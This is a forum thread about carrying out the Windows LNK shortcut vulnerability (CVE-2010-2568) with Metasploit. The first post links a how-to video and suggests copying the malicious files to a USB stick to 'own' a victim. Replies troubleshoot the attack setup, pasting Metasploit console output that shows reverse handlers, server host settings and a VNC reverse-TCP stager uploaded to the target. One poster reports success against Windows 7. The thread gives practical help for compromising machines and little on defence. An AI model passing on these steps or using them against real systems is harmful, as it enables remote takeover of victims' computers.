See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

[hardez]

I've posted a new blog about the Windows LNK vulnerability (CVE-2010-2568) and how you can protect yourself or customers against this vuln.

Metasploit released an exploit for it in the newest revision.
In the video i just show how to use the browser way but you can also put the files on a USB Stick and own you victim this way.

Have a look at
Windows LNK vulnerability (CVE-2010-2568) in action

Videolink: on Vimeo

[Archangel-Amael]

Thread moved from beginner section to here.

[Radar_mX]

autoplay feature is disabled by default in Windows 7 so with lnk file using desktop.ini doesn't work

I tested this on two PCs with Win7

win7 is vulnerable to this exploit but didn't work for me

[hardez]

I thought that this is the "new" and "dangerous" thing about this exploit that you don't need any autostart options 'cause Windows have a flaw in how it interprets the icon of the file!
So that it's executed as soon as Windows trys to load the icon of the link!

[Onemajorflaw]

Excuse my noob-ness, but the original post indicates towards some files you can put on a USB stick to execute this vulnerability, where might one find such files? Or are they included with Metasploit and located somewhere in the Metasploit directory?

[ravbyte]

autoplay feature is disabled by default in Windows 7 so with lnk file using desktop.ini doesn't work

I tested this on two PCs with Win7

win7 is vulnerable to this exploit but didn't work for me

did you test on a win xp? Meaby you 're skip or you can be wrong doing some thing, i read the all windows 're vulnerable no matter if you or the OS disables the auto run from the external usb devices, regards.

PS: Mods can i post a link with technical information? It' not of my authorship

[andytof47]

Hi Hardez,
(Great video)
Just watched your video and tried to reproduce it but I i'm missing something.

I can almost complete the exploit but it binds to my external card as an endpoint

Code:

meterpreter > run vnc[*] Creating a VNC reverse tcp stager: LHOST=10.0.0.95 LPORT=4545)[*] Running payload handler[*] VNC stager executable 73802 bytes long[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\mUCfWD.exe (must be deleted manually)[*] Executing the VNC agent with endpoint 10.0.0.95:4545...

So I tihnk the problem is that it is binding to my physical address and not to my vbox address

So I changed the srvhost in options to 192.168.56.1
but then I get

Code:

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit[*] Exploit running as background job.

[-] Handler failed to bind to 192.168.56.1:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit exception: The address is already in use (0.0.0.0:4444).

Sorry if this is in the wrong section, but it was in the noobs section, and I know this is certainly a noob question so i'm not sure..... any help would be appreciated

oh yes - I can open a vnc session no problems using the run one_vnc.rb exploit, so I guess I have the right software?

cheers all

Hi Hardez, Great video I just have a couple of questions - they are noob questions but since the video was moved here I'd still like to ask.

I'm following the exploit but instead of launching the exploit and binding to my Vbox adapter the exploit listens on my physical adapter on a different subnet, so I can't trigger the vulnerability.

I tried to change the srvhost in options but still no go!

here's what I tried

Code:

msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.56.1:4444 [*] [*] Send vulnerable clients to \\10.0.0.95\KfTO\.[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk[*] [*] Using URL: http://0.0.0.0:80/[*]  Local IP: http://10.0.0.95:80/[*] Server started.

So my question is howto change the local ip from 10.0.0.95:80 to 192.168.56.1:80?

I really appreciate the video and any feedback it would probably help other noobs too.

Also once the vuln is executed does that automatically start a vnc viewer like the one_vnc.rb exploit?
from room362
hxxp://www.room362.com/blog/month/december-2009

cheers again

[hardez]

@Onemajorflaw no need to excuse
like ravbyte said it doesn't matter wether you switch autostart on or off 'cause windows executes the exploit as soon as it finds the lnk file and thats in the moment you plug in the USB Drive.
The Video and the Metasploit version of this exploit is designed for exploiting by WebDav but there is a version (the original one for example) that is designt for USB.
I already asked HD Moore (coder of Metasploit) wether there will be a version for USB but he don't answered till now.

But you can run the exploit, open the WebDav from within Backtrack and copy the files to USB the only thing you have do do is keep running msfconsole till someone connects.

@andytof47
What I understand is that you run Backtrack in a VM right? And the IP of BT is 192.168.56.1? But it binds to 10blabla?
Is the Nic of the VM in bridged mode?
If not do so cause else VMware/VirtualBox doing NAT and I don't know whether this works or not with Metasploit.

To flaw #2 Metasploit can only bind one Port a session. So try another port like 4443 or restart metasploit then it should work

[Onemajorflaw]

@Onemajorflaw no need to excuse
like ravbyte said it doesn't matter wether you switch autostart on or off 'cause windows executes the exploit as soon as it finds the lnk file and thats in the moment you plug in the USB Drive.
The Video and the Metasploit version of this exploit is designed for exploiting by WebDav but there is a version (the original one for example) that is designt for USB.
I already asked HD Moore (coder of Metasploit) wether there will be a version for USB but he don't answered till now.

But you can run the exploit, open the WebDav from within Backtrack and copy the files to USB the only thing you have do do is keep running msfconsole till someone connects.

Ah, I see! Thanks for the reply, it makes MUCH more sense to me now! I'm going to have to try this out once I get off of work. Thanks again.

Sorry for the double post, but no one has been posting here!

I successfully executed this exploit on a Windows 7 machine, but the only problem is a session is never opened. The lnk and dll file are opened on the victim PC, and on my BackTrack machine it shows someone connecting, and its shows the requests being sent, and recieved, but nothing happens after that. Any suggestions?

[erdmaennchen]

Actually this exploit is deceted by Microsoft Essentials and Avira Antivir. I just tested this two programs with the newest definitions.

Without them the attack was succesfully.